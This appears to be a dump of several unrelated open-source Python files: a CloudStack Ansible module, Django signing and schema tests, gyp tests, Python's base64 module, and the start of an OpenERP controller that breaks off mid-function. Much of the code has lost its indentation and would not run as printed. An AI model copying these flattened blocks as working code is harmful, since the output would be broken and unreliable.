args['displayname'] = self.get_or_fallback('display_name', 'name')
args['group'] = self.module.params.get('group')
args['keypair'] = self.get_ssh_keypair(key='name')
args['size'] = self.module.params.get('disk_size')
args['startvm'] = start_vm
args['rootdisksize'] = self.module.params.get('root_disk_size')
args['affinitygroupnames'] = self.module.params.get('affinity_groups')
args['details'] = self.get_details()
args['securitygroupnames'] = self.module.params.get('security_groups')
args['hostid'] = self.get_host_id()
template_iso = self.get_template_or_iso()
if 'hypervisor' not in template_iso:
args['hypervisor'] = self.get_hypervisor()
instance = None
if not self.module.check_mode:
instance = self.query_api('deployVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def update_instance(self, instance, start_vm=True):
# Service offering data
args_service_offering = {
'id': instance['id'],
}
if self.module.params.get('service_offering'):
args_service_offering['serviceofferingid'] = self.get_service_offering_id()
service_offering_changed = self.has_changed(args_service_offering, instance)
# Instance data
args_instance_update = {
'id': instance['id'],
'userdata': self.get_user_data(),
}
instance['userdata'] = self._get_instance_user_data(instance)
args_instance_update['ostypeid'] = self.get_os_type(key='id')
if self.module.params.get('group'):
args_instance_update['group'] = self.module.params.get('group')
if self.module.params.get('display_name'):
args_instance_update['displayname'] = self.module.params.get('display_name')
instance_changed = self.has_changed(args_instance_update, instance)
ssh_key_changed = self.ssh_key_has_changed()
security_groups_changed = self.security_groups_has_changed()
# Volume data
args_volume_update = {}
root_disk_size = self.module.params.get('root_disk_size')
root_disk_size_changed = False
if root_disk_size is not None:
res = self.query_api('listVolumes', type='ROOT', virtualmachineid=instance['id'])
[volume] = res['volume']
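            # volume size is reported in bytes; shifting right by 30 bits
            # converts it to GiB for comparison with root_disk_size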
size = volume['size'] >> 30
args_volume_update['id'] = volume['id']
args_volume_update['size'] = root_disk_size
shrinkok = self.module.params.get('allow_root_disk_shrink')
if shrinkok:
args_volume_update['shrinkok'] = shrinkok
root_disk_size_changed = root_disk_size != size
changed = [
service_offering_changed,
instance_changed,
security_groups_changed,
ssh_key_changed,
root_disk_size_changed,
]
if any(changed):
force = self.module.params.get('force')
instance_state = instance['state'].lower()
if instance_state == 'stopped' or force:
self.result['changed'] = True
if not self.module.check_mode:
# Ensure VM has stopped
instance = self.stop_instance()
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Change service offering
if service_offering_changed:
res = self.query_api('changeServiceForVirtualMachine', **args_service_offering)
instance = res['virtualmachine']
self.instance = instance
# Update VM
if instance_changed or security_groups_changed:
if security_groups_changed:
args_instance_update['securitygroupnames'] = ','.join(self.module.params.get('security_groups'))
res = self.query_api('updateVirtualMachine', **args_instance_update)
instance = res['virtualmachine']
self.instance = instance
# Reset SSH key
if ssh_key_changed:
# SSH key data
args_ssh_key = {}
args_ssh_key['id'] = instance['id']
args_ssh_key['projectid'] = self.get_project(key='id')
args_ssh_key['keypair'] = self.module.params.get('ssh_key')
instance = self.query_api('resetSSHKeyForVirtualMachine', **args_ssh_key)
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Root disk size
if root_disk_size_changed:
async_result = self.query_api('resizeVolume', **args_volume_update)
self.poll_job(async_result, 'volume')
# Start VM again if it was running before
if instance_state == 'running' and start_vm:
instance = self.start_instance()
else:
self.module.warn("Changes won't be applied to running instances. " +
"Use force=true to allow the instance %s to be stopped/started." % instance['name'])
# migrate to other host
host_changed = all([
instance['state'].lower() == 'running',
self.module.params.get('host'),
self.module.params.get('host') != instance.get('hostname')
])
if host_changed:
self.result['changed'] = True
args_host = {
'virtualmachineid': instance['id'],
'hostid': self.get_host_id(),
}
if not self.module.check_mode:
res = self.query_api('migrateVirtualMachine', **args_host)
instance = self.poll_job(res, 'virtualmachine')
return instance
def recover_instance(self, instance):
if instance['state'].lower() in ['destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('recoverVirtualMachine', id=instance['id'])
instance = res['virtualmachine']
return instance
def absent_instance(self):
instance = self.get_instance()
if instance:
if instance['state'].lower() not in ['expunging', 'destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def expunge_instance(self):
instance = self.get_instance()
if instance:
res = {}
if instance['state'].lower() in ['destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'], expunge=True)
elif instance['state'].lower() not in ['expunging']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'], expunge=True)
poll_async = self.module.params.get('poll_async')
if poll_async:
res = self.poll_job(res, 'virtualmachine')
return instance
def stop_instance(self):
instance = self.get_instance()
        # in check mode the instance may not be instantiated
if instance:
if instance['state'].lower() in ['stopping', 'stopped']:
return instance
if instance['state'].lower() in ['starting', 'running']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.query_api('stopVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def start_instance(self):
instance = self.get_instance()
        # in check mode the instance may not be instantiated
if instance:
if instance['state'].lower() in ['starting', 'running']:
return instance
if instance['state'].lower() in ['stopped', 'stopping']:
self.result['changed'] = True
if not self.module.check_mode:
args = {
'id': instance['id'],
'hostid': self.get_host_id(),
}
instance = self.query_api('startVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def restart_instance(self):
instance = self.get_instance()
        # in check mode the instance may not be instantiated
if instance:
if instance['state'].lower() in ['running', 'starting']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.query_api('rebootVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
elif instance['state'].lower() in ['stopping', 'stopped']:
instance = self.start_instance()
return instance
def restore_instance(self):
instance = self.get_instance()
self.result['changed'] = True
        # in check mode instance may not be instantiated
if instance:
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
args['virtualmachineid'] = instance['id']
res = self.query_api('restoreVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def get_result(self, instance):
super(AnsibleCloudStackInstance, self).get_result(instance)
if instance:
self.result['user_data'] = self._get_instance_user_data(instance)
if 'securitygroup' in instance:
security_groups = []
for securitygroup in instance['securitygroup']:
security_groups.append(securitygroup['name'])
self.result['security_groups'] = security_groups
if 'affinitygroup' in instance:
affinity_groups = []
for affinitygroup in instance['affinitygroup']:
affinity_groups.append(affinitygroup['name'])
self.result['affinity_groups'] = affinity_groups
if 'nic' in instance:
for nic in instance['nic']:
if nic['isdefault']:
if 'ipaddress' in nic:
self.result['default_ip'] = nic['ipaddress']
if 'ip6address' in nic:
self.result['default_ip6'] = nic['ip6address']
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
name=dict(),
display_name=dict(),
group=dict(),
state=dict(choices=['present', 'deployed', 'started', 'stopped', 'restarted', 'restored', 'absent', 'destroyed', 'expunged'], default='present'),
service_offering=dict(),
cpu=dict(type='int'),
cpu_speed=dict(type='int'),
memory=dict(type='int'),
template=dict(),
iso=dict(),
template_filter=dict(
default="executable",
aliases=['iso_filter'],
choices=['all', 'featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community']
),
networks=dict(type='list', aliases=['network']),
ip_to_networks=dict(type='list', aliases=['ip_to_network']),
        ip_address=dict(default=None),
        ip6_address=dict(default=None),
disk_offering=dict(),
disk_size=dict(type='int'),
root_disk_size=dict(type='int'),
keyboard=dict(type='str', choices=['de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us']),
hypervisor=dict(choices=CS_HYPERVISORS),
host=dict(),
security_groups=dict(type='list', aliases=['security_group']),
affinity_groups=dict(type='list', aliases=['affinity_group']),
domain=dict(),
account=dict(),
project=dict(),
user_data=dict(),
zone=dict(),
ssh_key=dict(),
force=dict(type='bool', default=False),
tags=dict(type='list', aliases=['tag']),
details=dict(type='dict'),
poll_async=dict(type='bool', default=True),
allow_root_disk_shrink=dict(type='bool', default=False),
))
required_together = cs_required_together()
required_together.extend([
['cpu', 'cpu_speed', 'memory'],
])
module = AnsibleModule(
argument_spec=argument_spec,
required_together=required_together,
required_one_of=(
['display_name', 'name'],
),
mutually_exclusive=(
['template', 'iso'],
),
supports_check_mode=True
)
acs_instance = AnsibleCloudStackInstance(module)
state = module.params.get('state')
if state in ['absent', 'destroyed']:
instance = acs_instance.absent_instance()
elif state in ['expunged']:
instance = acs_instance.expunge_instance()
elif state in ['restored']:
acs_instance.present_instance()
instance = acs_instance.restore_instance()
elif state in ['present', 'deployed']:
instance = acs_instance.present_instance()
elif state in ['stopped']:
acs_instance.present_instance(start_vm=False)
instance = acs_instance.stop_instance()
elif state in ['started']:
acs_instance.present_instance()
instance = acs_instance.start_instance()
elif state in ['restarted']:
acs_instance.present_instance()
instance = acs_instance.restart_instance()
if instance and 'state' in instance and instance['state'].lower() == 'error':
module.fail_json(msg="Instance named '%s' in error state." % module.params.get('name'))
result = acs_instance.get_result(instance)
module.exit_json(**result)
if __name__ == '__main__':
main()
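# Hedged illustration (standalone sketch, not part of the module): every
# mutating method above follows the same pattern -- mark the result changed,
# skip the API call in check mode, and poll the async job only when the
# poll_async parameter is set. The helper below distills that pattern; the
# names are hypothetical.
def _apply_change_sketch(module, result, do_call, poll_job):
    result['changed'] = True
    res = None
    if not module.check_mode:
        res = do_call()
        if module.params.get('poll_async'):
            res = poll_job(res, 'virtualmachine')
    return res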
|
gpl-3.0
|
benjaminrigaud/django
|
tests/signing/tests.py
|
36
|
4807
|
from __future__ import unicode_literals
import time
from django.core import signing
from django.test import TestCase
from django.utils.encoding import force_str
from django.utils import six
class TestSigner(TestCase):
def test_signature(self):
"signature() method should generate a signature"
signer = signing.Signer('predictable-secret')
signer2 = signing.Signer('predictable-secret2')
for s in (
b'hello',
b'3098247:529:087:',
'\u2019'.encode('utf-8'),
):
self.assertEqual(
signer.signature(s),
signing.base64_hmac(signer.salt + 'signer', s,
'predictable-secret').decode()
)
self.assertNotEqual(signer.signature(s), signer2.signature(s))
def test_signature_with_salt(self):
"signature(value, salt=...) should work"
signer = signing.Signer('predictable-secret', salt='extra-salt')
self.assertEqual(
signer.signature('hello'),
signing.base64_hmac('extra-salt' + 'signer',
'hello', 'predictable-secret').decode()
)
self.assertNotEqual(
signing.Signer('predictable-secret', salt='one').signature('hello'),
signing.Signer('predictable-secret', salt='two').signature('hello'))
def test_sign_unsign(self):
"sign/unsign should be reversible"
signer = signing.Signer('predictable-secret')
examples = [
'q;wjmbk;wkmb',
'3098247529087',
'3098247:529:087:',
'jkw osanteuh ,rcuh nthu aou oauh ,ud du',
'\u2019',
]
if six.PY2:
examples.append(b'a byte string')
for example in examples:
signed = signer.sign(example)
self.assertIsInstance(signed, str)
self.assertNotEqual(force_str(example), signed)
self.assertEqual(example, signer.unsign(signed))
    def test_unsign_detects_tampering(self):
"unsign should raise an exception if the value has been tampered with"
signer = signing.Signer('predictable-secret')
value = 'Another string'
signed_value = signer.sign(value)
transforms = (
lambda s: s.upper(),
lambda s: s + 'a',
lambda s: 'a' + s[1:],
lambda s: s.replace(':', ''),
)
self.assertEqual(value, signer.unsign(signed_value))
for transform in transforms:
self.assertRaises(
signing.BadSignature, signer.unsign, transform(signed_value))
def test_dumps_loads(self):
"dumps and loads be reversible for any JSON serializable object"
objects = [
['a', 'list'],
'a unicode string \u2019',
{'a': 'dictionary'},
]
if six.PY2:
objects.append(b'a byte string')
for o in objects:
self.assertNotEqual(o, signing.dumps(o))
self.assertEqual(o, signing.loads(signing.dumps(o)))
self.assertNotEqual(o, signing.dumps(o, compress=True))
self.assertEqual(o, signing.loads(signing.dumps(o, compress=True)))
def test_decode_detects_tampering(self):
"loads should raise exception for tampered objects"
transforms = (
lambda s: s.upper(),
lambda s: s + 'a',
lambda s: 'a' + s[1:],
lambda s: s.replace(':', ''),
)
value = {
'foo': 'bar',
'baz': 1,
}
encoded = signing.dumps(value)
self.assertEqual(value, signing.loads(encoded))
for transform in transforms:
self.assertRaises(
signing.BadSignature, signing.loads, transform(encoded))
def test_works_with_non_ascii_keys(self):
        binary_key = b'\xe7'  # Set some binary (non-ASCII) key
s = signing.Signer(binary_key)
self.assertEqual('foo:6NB0fssLW5RQvZ3Y-MTerq2rX7w', s.sign('foo'))
class TestTimestampSigner(TestCase):
def test_timestamp_signer(self):
value = 'hello'
_time = time.time
time.time = lambda: 123456789
try:
signer = signing.TimestampSigner('predictable-key')
ts = signer.sign(value)
self.assertNotEqual(ts,
signing.Signer('predictable-key').sign(value))
self.assertEqual(signer.unsign(ts), value)
time.time = lambda: 123456800
self.assertEqual(signer.unsign(ts, max_age=12), value)
self.assertEqual(signer.unsign(ts, max_age=11), value)
self.assertRaises(
signing.SignatureExpired, signer.unsign, ts, max_age=10)
finally:
time.time = _time
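# Hedged standalone sketch (not Django's implementation): the tests above
# exercise a "value:signature" layout where the signature is an unpadded
# url-safe base64 HMAC. Django's real Signer also derives the HMAC key from
# the salt and the secret key, which this sketch simplifies away.
import base64 as _base64
import hashlib as _hashlib
import hmac as _hmac

def _sketch_sign(value, key):
    # value and key are byte strings
    mac = _hmac.new(key, value, _hashlib.sha1).digest()
    return value + b':' + _base64.urlsafe_b64encode(mac).rstrip(b'=')

def _sketch_unsign(signed, key):
    value = signed.rpartition(b':')[0]
    if _sketch_sign(value, key) != signed:
        raise ValueError('bad signature')  # stands in for signing.BadSignature
    return value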
|
bsd-3-clause
|
jiumx60rus/grishyGhost
|
node_modules/nodegit/node_modules/pangyp/gyp/pylib/gyp/input_test.py
|
1841
|
3207
|
#!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the input.py file."""
import gyp.input
import unittest
import sys
class TestFindCycles(unittest.TestCase):
def setUp(self):
self.nodes = {}
for x in ('a', 'b', 'c', 'd', 'e'):
self.nodes[x] = gyp.input.DependencyGraphNode(x)
def _create_dependency(self, dependent, dependency):
dependent.dependencies.append(dependency)
dependency.dependents.append(dependent)
def test_no_cycle_empty_graph(self):
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_no_cycle_line(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['d'])
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_no_cycle_dag(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['a'], self.nodes['c'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
for label, node in self.nodes.iteritems():
self.assertEquals([], node.FindCycles())
def test_cycle_self_reference(self):
self._create_dependency(self.nodes['a'], self.nodes['a'])
self.assertEquals([[self.nodes['a'], self.nodes['a']]],
self.nodes['a'].FindCycles())
def test_cycle_two_nodes(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['a'])
self.assertEquals([[self.nodes['a'], self.nodes['b'], self.nodes['a']]],
self.nodes['a'].FindCycles())
self.assertEquals([[self.nodes['b'], self.nodes['a'], self.nodes['b']]],
self.nodes['b'].FindCycles())
def test_two_cycles(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['a'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['b'])
cycles = self.nodes['a'].FindCycles()
self.assertTrue(
[self.nodes['a'], self.nodes['b'], self.nodes['a']] in cycles)
self.assertTrue(
[self.nodes['b'], self.nodes['c'], self.nodes['b']] in cycles)
self.assertEquals(2, len(cycles))
def test_big_cycle(self):
self._create_dependency(self.nodes['a'], self.nodes['b'])
self._create_dependency(self.nodes['b'], self.nodes['c'])
self._create_dependency(self.nodes['c'], self.nodes['d'])
self._create_dependency(self.nodes['d'], self.nodes['e'])
self._create_dependency(self.nodes['e'], self.nodes['a'])
self.assertEquals([[self.nodes['a'],
self.nodes['b'],
self.nodes['c'],
self.nodes['d'],
self.nodes['e'],
self.nodes['a']]],
self.nodes['a'].FindCycles())
if __name__ == '__main__':
unittest.main()
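# Hedged standalone sketch (not gyp's implementation): FindCycles reports each
# cycle as a node path that starts and ends on the same node, e.g. [a, b, a].
# A minimal depth-first search with the same output shape:
def _find_cycles_sketch(start, edges):
    # edges maps a node to the list of nodes it depends on
    cycles = []
    def visit(node, path):
        if node == start and path:
            cycles.append(path + [node])
            return
        if node in path:
            return
        for dep in edges.get(node, []):
            visit(dep, path + [node])
    visit(start, [])
    return cycles

# e.g. _find_cycles_sketch('a', {'a': ['b'], 'b': ['a']}) == [['a', 'b', 'a']]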
|
mit
|
dpiers/coderang-meteor
|
public/jsrepl/extern/python/closured/lib/python2.7/base64.py
|
229
|
11357
|
#! /usr/bin/env python
"""RFC 3548: Base16, Base32, Base64 Data Encodings"""
# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
import re
import struct
import binascii
__all__ = [
# Legacy interface exports traditional RFC 1521 Base64 encodings
'encode', 'decode', 'encodestring', 'decodestring',
# Generalized interface for other encodings
'b64encode', 'b64decode', 'b32encode', 'b32decode',
'b16encode', 'b16decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',
# Some common Base64 alternatives. As referenced by RFC 3458, see thread
# starting at:
#
# http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
'urlsafe_b64encode', 'urlsafe_b64decode',
]
_translation = [chr(_x) for _x in range(256)]
EMPTYSTRING = ''
def _translate(s, altchars):
translation = _translation[:]
for k, v in altchars.items():
translation[ord(k)] = v
return s.translate(''.join(translation))
# Base64 encoding/decoding uses binascii
def b64encode(s, altchars=None):
"""Encode a string using Base64.
s is the string to encode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies an
alternative alphabet for the '+' and '/' characters. This allows an
application to e.g. generate url or filesystem safe Base64 strings.
The encoded string is returned.
"""
# Strip off the trailing newline
encoded = binascii.b2a_base64(s)[:-1]
if altchars is not None:
return _translate(encoded, {'+': altchars[0], '/': altchars[1]})
return encoded
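# Hedged illustration (not part of the original module): altchars only swaps
# the two non-alphanumeric alphabet characters '+' and '/'.
def _demo_b64encode():
    assert b64encode('abc') == 'YWJj'
    assert b64encode('\xfb\xff') == '+/8='
    assert b64encode('\xfb\xff', '-_') == '-_8='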
def b64decode(s, altchars=None):
"""Decode a Base64 encoded string.
s is the string to decode. Optional altchars must be a string of at least
length 2 (additional characters are ignored) which specifies the
alternative alphabet used instead of the '+' and '/' characters.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if altchars is not None:
s = _translate(s, {altchars[0]: '+', altchars[1]: '/'})
try:
return binascii.a2b_base64(s)
except binascii.Error, msg:
# Transform this exception for consistency
raise TypeError(msg)
def standard_b64encode(s):
"""Encode a string using the standard Base64 alphabet.
s is the string to encode. The encoded string is returned.
"""
return b64encode(s)
def standard_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
"""
return b64decode(s)
def urlsafe_b64encode(s):
"""Encode a string using a url-safe Base64 alphabet.
s is the string to encode. The encoded string is returned. The alphabet
uses '-' instead of '+' and '_' instead of '/'.
"""
return b64encode(s, '-_')
def urlsafe_b64decode(s):
"""Decode a string encoded with the standard Base64 alphabet.
s is the string to decode. The decoded string is returned. A TypeError
is raised if the string is incorrectly padded or if there are non-alphabet
characters present in the string.
The alphabet uses '-' instead of '+' and '_' instead of '/'.
"""
return b64decode(s, '-_')
# Base32 encoding/decoding must be done in Python
_b32alphabet = {
0: 'A', 9: 'J', 18: 'S', 27: '3',
1: 'B', 10: 'K', 19: 'T', 28: '4',
2: 'C', 11: 'L', 20: 'U', 29: '5',
3: 'D', 12: 'M', 21: 'V', 30: '6',
4: 'E', 13: 'N', 22: 'W', 31: '7',
5: 'F', 14: 'O', 23: 'X',
6: 'G', 15: 'P', 24: 'Y',
7: 'H', 16: 'Q', 25: 'Z',
8: 'I', 17: 'R', 26: '2',
}
_b32tab = _b32alphabet.items()
_b32tab.sort()
_b32tab = [v for k, v in _b32tab]
_b32rev = dict([(v, long(k)) for k, v in _b32alphabet.items()])
def b32encode(s):
"""Encode a string using Base32.
s is the string to encode. The encoded string is returned.
"""
parts = []
quanta, leftover = divmod(len(s), 5)
# Pad the last quantum with zero bits if necessary
if leftover:
s += ('\0' * (5 - leftover))
quanta += 1
for i in range(quanta):
# c1 and c2 are 16 bits wide, c3 is 8 bits wide. The intent of this
# code is to process the 40 bits in units of 5 bits. So we take the 1
# leftover bit of c1 and tack it onto c2. Then we take the 2 leftover
# bits of c2 and tack them onto c3. The shifts and masks are intended
# to give us values of exactly 5 bits in width.
c1, c2, c3 = struct.unpack('!HHB', s[i*5:(i+1)*5])
c2 += (c1 & 1) << 16 # 17 bits wide
c3 += (c2 & 3) << 8 # 10 bits wide
parts.extend([_b32tab[c1 >> 11], # bits 1 - 5
_b32tab[(c1 >> 6) & 0x1f], # bits 6 - 10
_b32tab[(c1 >> 1) & 0x1f], # bits 11 - 15
_b32tab[c2 >> 12], # bits 16 - 20 (1 - 5)
_b32tab[(c2 >> 7) & 0x1f], # bits 21 - 25 (6 - 10)
_b32tab[(c2 >> 2) & 0x1f], # bits 26 - 30 (11 - 15)
_b32tab[c3 >> 5], # bits 31 - 35 (1 - 5)
_b32tab[c3 & 0x1f], # bits 36 - 40 (1 - 5)
])
encoded = EMPTYSTRING.join(parts)
# Adjust for any leftover partial quanta
if leftover == 1:
return encoded[:-6] + '======'
elif leftover == 2:
return encoded[:-4] + '===='
elif leftover == 3:
return encoded[:-3] + '==='
elif leftover == 4:
return encoded[:-1] + '='
return encoded
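# Hedged illustration (not part of the original module): one input byte leaves
# leftover == 1, so six pad characters are appended per the rules above, and
# decoding reverses the transformation.
def _demo_b32encode():
    assert b32encode('a') == 'ME======'
    assert b32encode('abcde') == 'MFRGGZDF'
    assert b32decode('ME======') == 'a'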
def b32decode(s, casefold=False, map01=None):
"""Decode a Base32 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
RFC 3548 allows for optional mapping of the digit 0 (zero) to the letter O
(oh), and for optional mapping of the digit 1 (one) to either the letter I
(eye) or letter L (el). The optional argument map01 when not None,
specifies which letter the digit 1 should be mapped to (when map01 is not
None, the digit 0 is always mapped to the letter O). For security
purposes the default is None, so that 0 and 1 are not allowed in the
input.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
quanta, leftover = divmod(len(s), 8)
if leftover:
raise TypeError('Incorrect padding')
# Handle section 2.4 zero and one mapping. The flag map01 will be either
# False, or the character to map the digit 1 (one) to. It should be
# either L (el) or I (eye).
if map01:
s = _translate(s, {'0': 'O', '1': map01})
if casefold:
s = s.upper()
# Strip off pad characters from the right. We need to count the pad
# characters because this will tell us how many null bytes to remove from
# the end of the decoded string.
padchars = 0
mo = re.search('(?P<pad>[=]*)$', s)
if mo:
padchars = len(mo.group('pad'))
if padchars > 0:
s = s[:-padchars]
# Now decode the full quanta
parts = []
acc = 0
shift = 35
for c in s:
        val = _b32rev.get(c)
        if val is None:
            raise TypeError('Non-base32 digit found')
        acc += val << shift
shift -= 5
if shift < 0:
parts.append(binascii.unhexlify('%010x' % acc))
acc = 0
shift = 35
# Process the last, partial quanta
last = binascii.unhexlify('%010x' % acc)
if padchars == 0:
last = '' # No characters
elif padchars == 1:
last = last[:-1]
elif padchars == 3:
last = last[:-2]
elif padchars == 4:
last = last[:-3]
elif padchars == 6:
last = last[:-4]
else:
raise TypeError('Incorrect padding')
parts.append(last)
return EMPTYSTRING.join(parts)
# RFC 3548, Base 16 Alphabet specifies uppercase, but hexlify() returns
# lowercase. The RFC also recommends against accepting input case
# insensitively.
def b16encode(s):
"""Encode a string using Base16.
s is the string to encode. The encoded string is returned.
"""
return binascii.hexlify(s).upper()
def b16decode(s, casefold=False):
"""Decode a Base16 encoded string.
s is the string to decode. Optional casefold is a flag specifying whether
a lowercase alphabet is acceptable as input. For security purposes, the
default is False.
The decoded string is returned. A TypeError is raised if s were
incorrectly padded or if there are non-alphabet characters present in the
string.
"""
if casefold:
s = s.upper()
if re.search('[^0-9A-F]', s):
raise TypeError('Non-base16 digit found')
return binascii.unhexlify(s)
# Legacy interface. This code could be cleaned up since I don't believe
# binascii has any line length limitations. It just doesn't seem worth it
# though.
MAXLINESIZE = 76 # Excluding the CRLF
MAXBINSIZE = (MAXLINESIZE//4)*3
def encode(input, output):
"""Encode a file."""
while True:
s = input.read(MAXBINSIZE)
if not s:
break
while len(s) < MAXBINSIZE:
ns = input.read(MAXBINSIZE-len(s))
if not ns:
break
s += ns
line = binascii.b2a_base64(s)
output.write(line)
def decode(input, output):
"""Decode a file."""
while True:
line = input.readline()
if not line:
break
s = binascii.a2b_base64(line)
output.write(s)
def encodestring(s):
"""Encode a string into multiple lines of base-64 data."""
pieces = []
for i in range(0, len(s), MAXBINSIZE):
chunk = s[i : i + MAXBINSIZE]
pieces.append(binascii.b2a_base64(chunk))
return "".join(pieces)
def decodestring(s):
"""Decode a string."""
return binascii.a2b_base64(s)
# Usable as a script...
def test():
"""Small test program"""
import sys, getopt
try:
opts, args = getopt.getopt(sys.argv[1:], 'deut')
except getopt.error, msg:
sys.stdout = sys.stderr
print msg
print """usage: %s [-d|-e|-u|-t] [file|-]
-d, -u: decode
-e: encode (default)
-t: encode and decode string 'Aladdin:open sesame'"""%sys.argv[0]
sys.exit(2)
func = encode
for o, a in opts:
if o == '-e': func = encode
if o == '-d': func = decode
if o == '-u': func = decode
if o == '-t': test1(); return
if args and args[0] != '-':
with open(args[0], 'rb') as f:
func(f, sys.stdout)
else:
func(sys.stdin, sys.stdout)
def test1():
s0 = "Aladdin:open sesame"
s1 = encodestring(s0)
s2 = decodestring(s1)
print s0, repr(s1), s2
if __name__ == '__main__':
test()
|
mit
|
ryanahall/django
|
tests/schema/fields.py
|
13
|
2628
|
from django.db.models.fields.related import (
RECURSIVE_RELATIONSHIP_CONSTANT, ManyRelatedObjectsDescriptor,
ManyToManyField, ManyToManyRel, RelatedField,
create_many_to_many_intermediary_model,
)
from django.utils.functional import curry
class CustomManyToManyField(RelatedField):
"""
Ticket #24104 - Need to have a custom ManyToManyField,
which is not an inheritor of ManyToManyField.
"""
many_to_many = True
def __init__(self, to, db_constraint=True, swappable=True, **kwargs):
try:
to._meta
except AttributeError:
to = str(to)
kwargs['rel'] = ManyToManyRel(
self, to,
related_name=kwargs.pop('related_name', None),
related_query_name=kwargs.pop('related_query_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
symmetrical=kwargs.pop('symmetrical', to == RECURSIVE_RELATIONSHIP_CONSTANT),
through=kwargs.pop('through', None),
through_fields=kwargs.pop('through_fields', None),
db_constraint=db_constraint,
)
self.swappable = swappable
self.db_table = kwargs.pop('db_table', None)
if kwargs['rel'].through is not None:
assert self.db_table is None, "Cannot specify a db_table if an intermediary model is used."
super(CustomManyToManyField, self).__init__(**kwargs)
def contribute_to_class(self, cls, name, **kwargs):
if self.remote_field.symmetrical and (
self.remote_field.model == "self" or self.remote_field.model == cls._meta.object_name):
self.remote_field.related_name = "%s_rel_+" % name
super(CustomManyToManyField, self).contribute_to_class(cls, name, **kwargs)
if not self.remote_field.through and not cls._meta.abstract and not cls._meta.swapped:
self.remote_field.through = create_many_to_many_intermediary_model(self, cls)
setattr(cls, self.name, ManyRelatedObjectsDescriptor(self.remote_field))
self.m2m_db_table = curry(self._get_m2m_db_table, cls._meta)
def get_internal_type(self):
return 'ManyToManyField'
# Copy those methods from ManyToManyField because they don't call super() internally
contribute_to_related_class = ManyToManyField.__dict__['contribute_to_related_class']
_get_m2m_attr = ManyToManyField.__dict__['_get_m2m_attr']
_get_m2m_reverse_attr = ManyToManyField.__dict__['_get_m2m_reverse_attr']
_get_m2m_db_table = ManyToManyField.__dict__['_get_m2m_db_table']
class InheritedManyToManyField(ManyToManyField):
pass
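# Hedged usage sketch (hypothetical models, not part of the original file):
# the custom field is declared like the stock ManyToManyField, e.g.
#
#     class Tag(models.Model):
#         pass
#
#     class Post(models.Model):
#         tags = CustomManyToManyField(Tag, related_name='posts')
#
# Declaring real models requires a configured Django app registry, so the
# example is left as a comment.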
|
bsd-3-clause
|
grap/OCB
|
addons/web/controllers/main.py
|
2
|
70114
|
# -*- coding: utf-8 -*-
import ast
import base64
import csv
import glob
import itertools
import logging
import operator
import datetime
import hashlib
import os
import re
import simplejson
import time
import urllib
import urllib2
import urlparse
import xmlrpclib
import zlib
from xml.etree import ElementTree
from cStringIO import StringIO
import babel.messages.pofile
import werkzeug.utils
import werkzeug.wrappers
try:
import xlwt
except ImportError:
xlwt = None
import openerp
import openerp.modules.registry
from openerp.tools.translate import _
from openerp.tools import config, ustr
from .. import http
openerpweb = http
#----------------------------------------------------------
# OpenERP Web helpers
#----------------------------------------------------------
def rjsmin(script):
""" Minify js with a clever regex.
Taken from http://opensource.perlig.de/rjsmin
Apache License, Version 2.0 """
def subber(match):
""" Substitution callback """
groups = match.groups()
return (
groups[0] or
groups[1] or
groups[2] or
